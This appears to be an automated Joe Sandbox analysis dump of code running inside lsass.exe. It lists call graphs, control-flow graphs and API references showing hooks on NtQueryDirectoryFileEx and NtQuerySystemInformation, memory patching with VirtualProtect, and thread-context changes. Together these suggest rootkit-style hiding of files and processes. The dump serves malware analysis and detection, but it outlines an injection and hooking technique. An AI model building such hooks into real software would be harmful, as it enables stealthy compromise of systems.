VirtualAlloc 8315->8313 8316 213bdce3fbb GetLastError 8315->8316 8316->8317 8317->8313 8317->8314 8317->8315 8321 213bdce4028 _invalid_parameter_noinfo 8318->8321 8319 213bdce4097 8319->8301 8320 213bdce407d VirtualQuery 8320->8319 8320->8321 8321->8319 8321->8320 8322 213bdce40e2 GetLastError 8321->8322 8322->8321 8324 213bdce772b 8323->8324 8325 213bdce7741 SetLastError 8324->8325 8326 213bdce774f 8324->8326 8325->8326 8326->8283 8640 213bdce2c34 8641 213bdce2c88 8640->8641 8642 213bdce2ca3 8641->8642 8644 213bdce35c4 8641->8644 8645 213bdce365a 8644->8645 8647 213bdce35e9 8644->8647 8645->8642 8646 213bdce3d4c StrCmpNIW 8646->8647 8647->8645 8647->8646 8648 213bdce1e04 StrCmpIW StrCmpW 8647->8648 8648->8647 9192 213bdcf43d1 __scrt_dllmain_exception_filter 8513 213bdcec2d0 8514 213bdcec2d8 8513->8514 8515 213bdcec305 8514->8515 8517 213bdcec334 8514->8517 8518 213bdcec35f 8517->8518 8519 213bdcec342 DeleteCriticalSection 8518->8519 8520 213bdcec363 8518->8520 8519->8518 8520->8515 9193 213bdce2dd0 9194 213bdce2e41 9193->9194 9195 213bdce3154 9194->9195 9196 213bdce2e6d 
GetModuleHandleA 9194->9196 9197 213bdce2e91 9196->9197 9198 213bdce2e7f GetProcAddress 9196->9198 9197->9195 9199 213bdce2eb8 StrCmpNIW 9197->9199 9198->9197 9199->9195 9203 213bdce2edd 9199->9203 9200 213bdce1a30 6 API calls 9200->9203 9201 213bdce2fef lstrlenW 9201->9203 9202 213bdce3099 lstrlenW 9202->9203 9203->9195 9203->9200 9203->9201 9203->9202 9204 213bdce3d4c StrCmpNIW 9203->9204 9205 213bdce1cf8 StrCmpIW StrCmpW 9203->9205 9204->9203 9205->9203 8649 213bdce5a4d 8651 213bdce5a54 8649->8651 8650 213bdce5abb 8651->8650 8652 213bdce5b37 VirtualProtect 8651->8652 8653 213bdce5b63 GetLastError 8652->8653 8654 213bdce5b71 8652->8654 8653->8654 8521 213bdce8ccc 8528 213bdce922c 8521->8528 8526 213bdce8cd9 8529 213bdce9234 8528->8529 8531 213bdce9265 8529->8531 8532 213bdce8cd5 8529->8532 8545 213bdce9ae8 8529->8545 8533 213bdce9274 __vcrt_uninitialize_locks DeleteCriticalSection 8531->8533 8532->8526 8534 213bdce91c0 8532->8534 8533->8532 8550 213bdce99bc 8534->8550 8546 213bdce986c __vcrt_InitializeCriticalSectionEx 5 API calls 8545->8546 8547 213bdce9b1e 8546->8547 8548 213bdce9b33 InitializeCriticalSectionAndSpinCount 8547->8548 8549 213bdce9b28 8547->8549 8548->8549 8549->8529 8551 213bdce986c __vcrt_InitializeCriticalSectionEx 5 API calls 8550->8551 8552 213bdce99e1 TlsAlloc 8551->8552 9206 213bdce7fcc 9213 213bdce8cf4 9206->9213 9209 213bdce7fd9 9214 213bdce9100 __CxxCallCatchBlock 9 API calls 9213->9214 9215 213bdce7fd5 9214->9215 9215->9209 9216 213bdcec048 9215->9216 9217 213bdcec8d0 __free_lconv_mon 13 API calls 9216->9217 9218 213bdce7fe2 9217->9218 9218->9209 9219 213bdce8d08 9218->9219 9222 213bdce909c 9219->9222 9221 213bdce8d11 9221->9209 9223 213bdce90ad 9222->9223 9224 213bdce90c2 9222->9224 9225 213bdce9a4c __CxxCallCatchBlock 6 API calls 9223->9225 9224->9221 9226 213bdce90b2 9225->9226 9228 213bdce9a94 9226->9228 9229 213bdce986c __vcrt_InitializeCriticalSectionEx 5 API calls 9228->9229 9230 213bdce9ac2 9229->9230 9231 213bdce9acc 9230->9231 
9232 213bdce9ad4 TlsSetValue 9230->9232 9231->9224 9232->9231 9233 213bdcefbe0 9234 213bdcefc0a 9233->9234 9235 213bdcecfe0 _invalid_parameter_noinfo 13 API calls 9234->9235 9236 213bdcefc2a 9235->9236 9237 213bdced060 __free_lconv_mon 13 API calls 9236->9237 9238 213bdcefc38 9237->9238 9239 213bdcefc62 9238->9239 9241 213bdcecfe0 _invalid_parameter_noinfo 13 API calls 9238->9241 9240 213bdcefc81 InitializeCriticalSectionEx 9239->9240 9243 213bdcefc6b 9239->9243 9240->9239 9242 213bdcefc54 9241->9242 9244 213bdced060 __free_lconv_mon 13 API calls 9242->9244 9244->9239 9245 213bdcef5e0 9248 213bdcef598 9245->9248 9253 213bdcec318 EnterCriticalSection 9248->9253 8554 213bdce40e0 8556 213bdce402d _invalid_parameter_noinfo 8554->8556 8555 213bdce407d VirtualQuery 8555->8556 8558 213bdce4097 8555->8558 8556->8555 8557 213bdce40e2 GetLastError 8556->8557 8556->8558 8557->8556 8336 213bdcf455d 8339 213bdceacf4 8336->8339 8340 213bdcead0e 8339->8340 8342 213bdcead5b 8339->8342 8341 213bdce90e4 __CxxCallCatchBlock 9 API calls 8340->8341 8340->8342 8341->8342 9254 213bdcebfd8 9255 213bdced060 __free_lconv_mon 13 API calls 9254->9255 9256 213bdcebfe8 9255->9256 9257 213bdced060 __free_lconv_mon 13 API calls 9256->9257 9258 213bdcebffc 9257->9258 9259 213bdced060 __free_lconv_mon 13 API calls 9258->9259 9260 213bdcec010 9259->9260 9261 213bdced060 __free_lconv_mon 13 API calls 9260->9261 9262 213bdcec024 9261->9262 7593 213bdce27d4 NtQueryDirectoryFileEx 7594 213bdce285e _invalid_parameter_noinfo 7593->7594 7606 213bdce2984 7593->7606 7595 213bdce28b5 GetFileType 7594->7595 7594->7606 7596 213bdce28d9 7595->7596 7597 213bdce28c3 StrCpyW 7595->7597 7609 213bdce1ad0 GetFinalPathNameByHandleW 7596->7609 7598 213bdce28e8 7597->7598 7602 213bdce2989 7598->7602 7607 213bdce28f2 7598->7607 7600 213bdce3d4c StrCmpNIW 7600->7602 7602->7600 7603 213bdce34d8 4 API calls 7602->7603 7604 213bdce1dd0 2 API calls 7602->7604 7602->7606 7603->7602 7604->7602 7607->7606 7614 213bdce3d4c 
7607->7614 7617 213bdce34d8 StrCmpIW 7607->7617 7621 213bdce1dd0 7607->7621 7610 213bdce1b39 7609->7610 7611 213bdce1afa StrCmpNIW 7609->7611 7610->7598 7611->7610 7612 213bdce1b14 lstrlenW 7611->7612 7612->7610 7613 213bdce1b26 StrCpyW 7612->7613 7613->7610 7615 213bdce3d6e 7614->7615 7616 213bdce3d59 StrCmpNIW 7614->7616 7615->7607 7616->7615 7618 213bdce3521 PathCombineW 7617->7618 7619 213bdce350a StrCpyW StrCatW 7617->7619 7620 213bdce352a 7618->7620 7619->7620 7620->7607 7622 213bdce1de7 7621->7622 7624 213bdce1df0 7621->7624 7623 213bdce1530 2 API calls 7622->7623 7623->7624 7624->7607 9263 213bdcee9f0 GetCommandLineA GetCommandLineW 8559 213bdce24f0 8561 213bdce257b _invalid_parameter_noinfo 8559->8561 8560 213bdce26ab 8561->8560 8562 213bdce25dd GetFileType 8561->8562 8563 213bdce2601 8562->8563 8564 213bdce25eb StrCpyW 8562->8564 8566 213bdce1ad0 4 API calls 8563->8566 8565 213bdce2610 8564->8565 8569 213bdce26b0 8565->8569 8571 213bdce2619 8565->8571 8566->8565 8567 213bdce3d4c StrCmpNIW 8567->8569 8568 213bdce3d4c StrCmpNIW 8568->8571 8569->8560 8569->8567 8570 213bdce34d8 4 API calls 8569->8570 8572 213bdce1dd0 2 API calls 8569->8572 8570->8569 8571->8560 8571->8568 8573 213bdce34d8 4 API calls 8571->8573 8574 213bdce1dd0 2 API calls 8571->8574 8572->8569 8573->8571 8574->8571 9264 213bdce61f0 9265 213bdce61fd 9264->9265 9266 213bdce6209 9265->9266 9271 213bdce631a 9265->9271 9267 213bdce628d 9266->9267 9268 213bdce6266 SetThreadContext 9266->9268 9268->9267 9269 213bdce6341 VirtualProtect FlushInstructionCache 9269->9271 9270 213bdce63fe 9272 213bdce641e 9270->9272 9274 213bdce48e0 VirtualFree 9270->9274 9271->9269 9271->9270 9273 213bdce52f0 3 API calls 9272->9273 9277 213bdce6423 9273->9277 9274->9272 9275 213bdce6477 9278 213bdce7e30 _invalid_parameter_noinfo 8 API calls 9275->9278 9276 213bdce6437 ResumeThread 9276->9277 9277->9275 9277->9276 9279 213bdce64bf 9278->9279 8575 213bdce84ec 8578 213bdce8e80 8575->8578 8577 213bdce8515 8579 213bdce8ea1 
8578->8579 8581 213bdce8ed6 8578->8581 8580 213bdcec0e8 __std_exception_copy 38 API calls 8579->8580 8579->8581 8580->8581 8581->8577 8678 213bdcea86c 8679 213bdcea899 __except_validate_context_record 8678->8679 8680 213bdce90e4 __CxxCallCatchBlock 9 API calls 8679->8680 8681 213bdcea89e 8680->8681 8683 213bdcea8f8 8681->8683 8685 213bdcea986 8681->8685 8692 213bdcea94c 8681->8692 8682 213bdcea9f4 8682->8692 8720 213bdce9fec 8682->8720 8684 213bdcea973 8683->8684 8683->8692 8693 213bdcea91a __GetCurrentState 8683->8693 8707 213bdce9390 8684->8707 8689 213bdcea9a5 8685->8689 8714 213bdce978c 8685->8714 8689->8682 8689->8692 8717 213bdce97a0 8689->8717 8691 213bdceaa9d 8693->8691 8695 213bdcead78 8693->8695 8696 213bdce978c Is_bad_exception_allowed 9 API calls 8695->8696 8697 213bdceada7 __GetCurrentState 8696->8697 8698 213bdce90e4 __CxxCallCatchBlock 9 API calls 8697->8698 8705 213bdceadc4 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8698->8705 8699 213bdceaebb 8700 213bdce90e4 __CxxCallCatchBlock 9 API calls 8699->8700 8701 213bdceaec0 8700->8701 8702 213bdce90e4 __CxxCallCatchBlock 9 API calls 8701->8702 8703 213bdceaecb __FrameHandler3::GetHandlerSearchState 8701->8703 8702->8703 8703->8692 8704 213bdce978c 9 API calls Is_bad_exception_allowed 8704->8705 8705->8699 8705->8703 8705->8704 8706 213bdce97b4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8705->8706 8706->8705 8777 213bdce93f4 8707->8777 8709 213bdce93af __FrameHandler3::ExecutionInCatch 8781 213bdce9300 8709->8781 8712 213bdcead78 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8713 213bdce93e4 8712->8713 8713->8692 8715 213bdce90e4 __CxxCallCatchBlock 9 API calls 8714->8715 8716 213bdce9795 8715->8716 8716->8689 8718 213bdce90e4 __CxxCallCatchBlock 9 API calls 8717->8718 8719 213bdce97a9 8718->8719 8719->8682 8785 213bdceaf04 8720->8785 8722 213bdcea4b4 8723 213bdcea405 8723->8722 8763 213bdcea403 8723->8763 8838 213bdcea4bc 8723->8838 8724 213bdcea133 8724->8723 8768 
213bdcea16b 8724->8768 8726 213bdce90e4 __CxxCallCatchBlock 9 API calls 8730 213bdcea447 8726->8730 8727 213bdcea335 8734 213bdce978c Is_bad_exception_allowed 9 API calls 8727->8734 8735 213bdcea352 8727->8735 8727->8763 8728 213bdce90e4 __CxxCallCatchBlock 9 API calls 8731 213bdcea09a 8728->8731 8730->8722 8732 213bdce7e30 _invalid_parameter_noinfo 8 API calls 8730->8732 8731->8730 8736 213bdce90e4 __CxxCallCatchBlock 9 API calls 8731->8736 8733 213bdcea45a 8732->8733 8733->8692 8734->8735 8739 213bdcea374 8735->8739 8735->8763 8831 213bdce9364 8735->8831 8738 213bdcea0aa 8736->8738 8740 213bdce90e4 __CxxCallCatchBlock 9 API calls 8738->8740 8741 213bdcea38a 8739->8741 8742 213bdcea497 8739->8742 8739->8763 8743 213bdcea0b3 8740->8743 8744 213bdcea395 8741->8744 8747 213bdce978c Is_bad_exception_allowed 9 API calls 8741->8747 8745 213bdce90e4 __CxxCallCatchBlock 9 API calls 8742->8745 8796 213bdce97cc 8743->8796 8750 213bdceaf9c 9 API calls 8744->8750 8748 213bdcea49d 8745->8748 8747->8744 8751 213bdce90e4 __CxxCallCatchBlock 9 API calls 8748->8751 8752 213bdcea3ab 8750->8752 8754 213bdcea4a6 8751->8754 8757 213bdce93f4 __GetUnwindTryBlock RtlLookupFunctionEntry 8752->8757 8752->8763 8753 213bdce90e4 __CxxCallCatchBlock 9 API calls 8756 213bdcea0f5 8753->8756 8755 213bdcec0b4 14 API calls 8754->8755 8755->8722 8756->8724 8759 213bdce90e4 __CxxCallCatchBlock 9 API calls 8756->8759 8758 213bdcea3c5 8757->8758 8835 213bdce95f8 RtlUnwindEx 8758->8835 8762 213bdcea101 8759->8762 8760 213bdce97a0 9 API calls 8760->8768 8764 213bdce90e4 __CxxCallCatchBlock 9 API calls 8762->8764 8763->8726 8766 213bdcea10a 8764->8766 8799 213bdceaf9c 8766->8799 8768->8727 8768->8760 8810 213bdcea72c 8768->8810 8824 213bdce9f18 8768->8824 8771 213bdcea11e 8806 213bdceb08c 8771->8806 8773 213bdcea491 8774 213bdcec0b4 14 API calls 8773->8774 8774->8742 8775 213bdcea126 __CxxCallCatchBlock std::bad_alloc::bad_alloc 8775->8773 8776 213bdce8f38 Concurrency::cancel_current_task 2 API calls 
8775->8776 8776->8773 8778 213bdce9422 __FrameHandler3::ExecutionInCatch 8777->8778 8779 213bdce944c RtlLookupFunctionEntry 8778->8779 8780 213bdce9494 8778->8780 8779->8778 8780->8709 8782 213bdce9320 8781->8782 8783 213bdce934b 8781->8783 8782->8783 8784 213bdce90e4 __CxxCallCatchBlock 9 API calls 8782->8784 8783->8712 8784->8782 8786 213bdceaf29 __FrameHandler3::ExecutionInCatch 8785->8786 8787 213bdce93f4 __GetUnwindTryBlock RtlLookupFunctionEntry 8786->8787 8788 213bdceaf3e 8787->8788 8850 213bdce9b74 8788->8850 8791 213bdceaf50 __FrameHandler3::GetHandlerSearchState 8853 213bdce9bac 8791->8853 8792 213bdceaf73 8793 213bdce9b74 __GetUnwindTryBlock RtlLookupFunctionEntry 8792->8793 8794 213bdcea04e 8793->8794 8794->8722 8794->8724 8794->8728 8797 213bdce90e4 __CxxCallCatchBlock 9 API calls 8796->8797 8798 213bdce97da 8797->8798 8798->8722 8798->8753 8800 213bdceb083 8799->8800 8802 213bdceafc7 8799->8802 8801 213bdcea11a 8801->8724 8801->8771 8802->8801 8803 213bdce97a0 9 API calls 8802->8803 8804 213bdce978c Is_bad_exception_allowed 9 API calls 8802->8804 8805 213bdcea72c 9 API calls 8802->8805 8803->8802 8804->8802 8805->8802 8807 213bdceb0f9 8806->8807 8809 213bdceb0a9 Is_bad_exception_allowed 8806->8809 8807->8775 8808 213bdce978c 9 API calls Is_bad_exception_allowed 8808->8809 8809->8807 8809->8808 8811 213bdcea759 8810->8811 8823 213bdcea7e8 8810->8823 8812 213bdce978c Is_bad_exception_allowed 9 API calls 8811->8812 8813 213bdcea762 8812->8813 8814 213bdce978c Is_bad_exception_allowed 9 API calls 8813->8814 8815 213bdcea77b 8813->8815 8813->8823 8814->8815 8816 213bdcea7a7 8815->8816 8817 213bdce978c Is_bad_exception_allowed 9 API calls 8815->8817 8815->8823 8818 213bdce97a0 9 API calls 8816->8818 8817->8816 8819 213bdcea7bb 8818->8819 8820 213bdce978c Is_bad_exception_allowed 9 API calls 8819->8820 8821 213bdcea7d4 8819->8821 8819->8823 8820->8821 8822 213bdce97a0 9 API calls 8821->8822 8822->8823 8823->8768 8825 213bdce93f4 __GetUnwindTryBlock 
RtlLookupFunctionEntry 8824->8825 8826 213bdce9f55 8825->8826 8827 213bdce978c Is_bad_exception_allowed 9 API calls 8826->8827 8828 213bdce9f8d 8827->8828 8829 213bdce95f8 9 API calls 8828->8829 8830 213bdce9fd1 8829->8830 8830->8768 8832 213bdce9378 __FrameHandler3::ExecutionInCatch 8831->8832 8833 213bdce9300 __FrameHandler3::ExecutionInCatch 9 API calls 8832->8833 8834 213bdce9382 8833->8834 8834->8739 8836 213bdce7e30 _invalid_parameter_noinfo 8 API calls 8835->8836 8837 213bdce96f2 8836->8837 8837->8763 8839 213bdcea708 8838->8839 8840 213bdcea4f5 8838->8840 8839->8763 8841 213bdce90e4 __CxxCallCatchBlock 9 API calls 8840->8841 8842 213bdcea4fa 8841->8842 8843 213bdcea519 EncodePointer 8842->8843 8849 213bdcea56c 8842->8849 8844 213bdce90e4 __CxxCallCatchBlock 9 API calls 8843->8844 8845 213bdcea529 8844->8845 8845->8849 8856 213bdce92ac 8845->8856 8847 213bdce978c 9 API calls Is_bad_exception_allowed 8847->8849 8848 213bdce9f18 19 API calls 8848->8849 8849->8839 8849->8847 8849->8848 8851 213bdce93f4 __GetUnwindTryBlock RtlLookupFunctionEntry 8850->8851 8852 213bdce9b87 8851->8852 8852->8791 8852->8792 8854 213bdce93f4 __GetUnwindTryBlock RtlLookupFunctionEntry 8853->8854 8855 213bdce9bc6 8854->8855 8855->8794 8857 213bdce90e4 __CxxCallCatchBlock 9 API calls 8856->8857 8858 213bdce92d8 8857->8858 8858->8849 8347 213bdcf0d68 8348 213bdcf0d8c 8347->8348 8349 213bdce7e30 _invalid_parameter_noinfo 8 API calls 8348->8349 8350 213bdcf0dce 8349->8350 9280 213bdcec5e8 9281 213bdcec5ed 9280->9281 9282 213bdcec602 9280->9282 9286 213bdcec608 9281->9286 9287 213bdcec64a 9286->9287 9288 213bdcec652 9286->9288 9289 213bdced060 __free_lconv_mon 13 API calls 9287->9289 9290 213bdced060 __free_lconv_mon 13 API calls 9288->9290 9289->9288 9291 213bdcec65f 9290->9291 9292 213bdced060 __free_lconv_mon 13 API calls 9291->9292 9293 213bdcec66c 9292->9293 9294 213bdced060 __free_lconv_mon 13 API calls 9293->9294 9295 213bdcec679 9294->9295 9296 213bdced060 __free_lconv_mon 13 API 
calls 9295->9296 9297 213bdcec686 9296->9297 9298 213bdced060 __free_lconv_mon 13 API calls 9297->9298 9299 213bdcec693 9298->9299 9300 213bdced060 __free_lconv_mon 13 API calls 9299->9300 9301 213bdcec6a0 9300->9301 9302 213bdced060 __free_lconv_mon 13 API calls 9301->9302 9303 213bdcec6ad 9302->9303 9304 213bdced060 __free_lconv_mon 13 API calls 9303->9304 9305 213bdcec6bd 9304->9305 9306 213bdced060 __free_lconv_mon 13 API calls 9305->9306 9307 213bdcec6cd 9306->9307 9312 213bdcec4b8 9307->9312 9326 213bdcec318 EnterCriticalSection 9312->9326

Control-flow Graph

                                                                                                                                  control_flow_graph 5 213bdce27d4-213bdce2858 NtQueryDirectoryFileEx 6 213bdce285e-213bdce2861 5->6 7 213bdce2a7c-213bdce2a9f 5->7 6->7 8 213bdce2867-213bdce2875 6->8 8->7 9 213bdce287b-213bdce28c1 call 213bdcf3ea0 * 3 GetFileType 8->9 16 213bdce28d9-213bdce28e3 call 213bdce1ad0 9->16 17 213bdce28c3-213bdce28d7 StrCpyW 9->17 18 213bdce28e8-213bdce28ec 16->18 17->18 20 213bdce28f2-213bdce28f7 18->20 21 213bdce29d9-213bdce29f2 call 213bdce353c call 213bdce3d4c 18->21 23 213bdce28fa-213bdce28ff 20->23 34 213bdce2989-213bdce29d3 21->34 35 213bdce29f4-213bdce2a23 call 213bdce353c call 213bdce34d8 call 213bdce1dd0 21->35 25 213bdce2901-213bdce2904 23->25 26 213bdce291c 23->26 25->26 29 213bdce2906-213bdce2909 25->29 27 213bdce291f-213bdce2938 call 213bdce353c call 213bdce3d4c 26->27 43 213bdce293e-213bdce296d call 213bdce353c call 213bdce34d8 call 213bdce1dd0 27->43 44 213bdce2a2b-213bdce2a2d 27->44 29->26 32 213bdce290b-213bdce290e 29->32 32->26 36 213bdce2910-213bdce2913 32->36 34->7 34->21 35->34 60 213bdce2a29 35->60 36->26 39 213bdce2915-213bdce291a 36->39 39->26 39->27 43->44 66 213bdce2973-213bdce297e 43->66 48 213bdce2a2f-213bdce2a49 44->48 49 213bdce2a4e-213bdce2a51 44->49 48->23 50 213bdce2a5b-213bdce2a5e 49->50 51 213bdce2a53-213bdce2a59 49->51 54 213bdce2a60-213bdce2a63 50->54 55 213bdce2a79 50->55 51->7 54->55 58 213bdce2a65-213bdce2a68 54->58 55->7 58->55 61 213bdce2a6a-213bdce2a6d 58->61 60->7 61->55 63 213bdce2a6f-213bdce2a72 61->63 63->55 65 213bdce2a74-213bdce2a77 63->65 65->7 65->55 66->23 67 213bdce2984 66->67 67->7
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
• Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
Similarity
• API ID: File$DirectoryQueryType
• String ID: \\.\pipe\
• API String ID: 4175507832-91387939
• Opcode ID: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
• Instruction ID: 3d26f4e96233d816744d82a11ef1c138f2a041977b4f6f17d2ba281c401817ef
• Opcode Fuzzy Hash: 8dea155f3f19a94179284ebfe6d1d35a52e64b2762c8427805ec0788098b2eca
• Instruction Fuzzy Hash: 5071B472208B8953EF34DE2698483EAA796F3AD78CF550136DE4947789FE36D7058700

Control-flow Graph

                                                                                                                                  control_flow_graph 68 213bdce2214-213bdce224e NtQuerySystemInformation 69 213bdce2250-213bdce2254 68->69 70 213bdce2257-213bdce225a 68->70 69->70 71 213bdce2260-213bdce2263 70->71 72 213bdce240b-213bdce242b 70->72 73 213bdce235b-213bdce235e 71->73 74 213bdce2269-213bdce227b 71->74 75 213bdce23cf-213bdce23d2 73->75 76 213bdce2360-213bdce237a call 213bdce3398 73->76 74->72 77 213bdce2281-213bdce228d 74->77 75->72 81 213bdce23d4-213bdce23e7 call 213bdce3398 75->81 76->72 86 213bdce2380-213bdce2396 76->86 79 213bdce228f-213bdce229f 77->79 80 213bdce22bb-213bdce22c6 call 213bdce1cc0 77->80 79->80 83 213bdce22a1-213bdce22b9 StrCmpNIW 79->83 87 213bdce22e7-213bdce22f9 80->87 94 213bdce22c8-213bdce22e0 call 213bdce1d2c 80->94 81->72 93 213bdce23e9-213bdce23f1 81->93 83->80 83->87 86->72 92 213bdce2398-213bdce23b4 86->92 90 213bdce22fb-213bdce22fd 87->90 91 213bdce2309-213bdce230b 87->91 95 213bdce22ff-213bdce2302 90->95 96 213bdce2304-213bdce2307 90->96 97 213bdce2312 91->97 98 213bdce230d-213bdce2310 91->98 99 213bdce23b8-213bdce23cb 92->99 93->72 100 213bdce23f3-213bdce23fb 93->100 94->87 108 213bdce22e2-213bdce22e5 94->108 102 213bdce2315-213bdce2318 95->102 96->102 97->102 98->102 99->99 103 213bdce23cd 99->103 104 213bdce23fe-213bdce2409 100->104 106 213bdce231a-213bdce2320 102->106 107 213bdce2326-213bdce2329 102->107 103->72 104->72 104->104 106->77 106->107 107->72 109 213bdce232f-213bdce2333 107->109 108->102 110 213bdce234a-213bdce2356 109->110 111 213bdce2335-213bdce2338 109->111 110->72 111->72 112 213bdce233e-213bdce2343 111->112 112->109 113 213bdce2345 112->113 113->72
APIs
• NtQuerySystemInformation.NTDLL ref: 00000213BDCE223F
• StrCmpNIW.SHLWAPI ref: 00000213BDCE22AE
  • Part of subcall function 00000213BDCE3398: GetProcessHeap.KERNEL32(?,?,?,?,?,00000213BDCE23E5), ref: 00000213BDCE33BB
  • Part of subcall function 00000213BDCE3398: HeapAlloc.KERNEL32(?,?,?,?,?,00000213BDCE23E5), ref: 00000213BDCE33CE
  • Part of subcall function 00000213BDCE3398: StrCmpNIW.SHLWAPI(?,?,?,?,?,00000213BDCE23E5), ref: 00000213BDCE3443
  • Part of subcall function 00000213BDCE3398: GetProcessHeap.KERNEL32(?,?,?,?,?,00000213BDCE23E5), ref: 00000213BDCE34A9
  • Part of subcall function 00000213BDCE3398: HeapFree.KERNEL32(?,?,?,?,?,00000213BDCE23E5), ref: 00000213BDCE34B7
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
• Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
Similarity
• API ID: Heap$Process$AllocFreeInformationQuerySystem
• String ID: $77$S
• API String ID: 722747020-3174149180
• Opcode ID: d308c3b46bb91a8aa47e79ae8dab7f0f4daab71c5cf7151acd44c2c1b3380d6f
• Instruction ID: b03782096289f2a850eff6b5594ec020bd9c9ac6fc2f8c2e5cc3fd53152fcd47
• Opcode Fuzzy Hash: d308c3b46bb91a8aa47e79ae8dab7f0f4daab71c5cf7151acd44c2c1b3380d6f
• Instruction Fuzzy Hash: 7751B2B2B14A2883EF60CF21D448BEDA3A6F72879CF044121DE0657B45EB36EB52C700

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
• Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
• Opcode ID: 8ec5aa73b904ba0ae152e0023bf61817b040c34d1fdb6eca25b3f21a7418f015
• Instruction ID: d06895fa276b780de0963ea568b078f0b60c848c687486bd70a92498e7706ae6
• Opcode Fuzzy Hash: 8ec5aa73b904ba0ae152e0023bf61817b040c34d1fdb6eca25b3f21a7418f015
• Instruction Fuzzy Hash: F6F031B231868592EF20CF25E9987D96762F764B8CF845020DA4946598EA7ECB5CC700

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
• Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: 6d4e741a80645aa38d679c7d836c804d7a921615e82b3422f13091cf6fe4e87e
• Instruction ID: f0c05ff4b6a3c183fa54b17e78690c58b10f56ad85a1d34e7c37175fa386ebdf
• Opcode Fuzzy Hash: 6d4e741a80645aa38d679c7d836c804d7a921615e82b3422f13091cf6fe4e87e
• Instruction Fuzzy Hash: 24E0ED7162154086EB08DB62D80C2D97BA2FB98B1DF45D024CA090B318EF399A9D8610

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32 ref: 00000213BDCE3805
• PathFindFileNameW.SHLWAPI ref: 00000213BDCE3814
  • Part of subcall function 00000213BDCE3D4C: StrCmpNIW.SHLWAPI(?,?,?,00000213BDCE2722), ref: 00000213BDCE3D64
  • Part of subcall function 00000213BDCE3C98: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000213BDCE382B), ref: 00000213BDCE3CA6
  • Part of subcall function 00000213BDCE3C98: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000213BDCE382B), ref: 00000213BDCE3CD4
  • Part of subcall function 00000213BDCE3C98: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000213BDCE382B), ref: 00000213BDCE3CF6
  • Part of subcall function 00000213BDCE3C98: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000213BDCE382B), ref: 00000213BDCE3D11
  • Part of subcall function 00000213BDCE3C98: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000213BDCE382B), ref: 00000213BDCE3D32
• CreateThread.KERNELBASE ref: 00000213BDCE385B
  • Part of subcall function 00000213BDCE1E38: GetCurrentThread.KERNEL32 ref: 00000213BDCE1E43
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                   • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                   • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
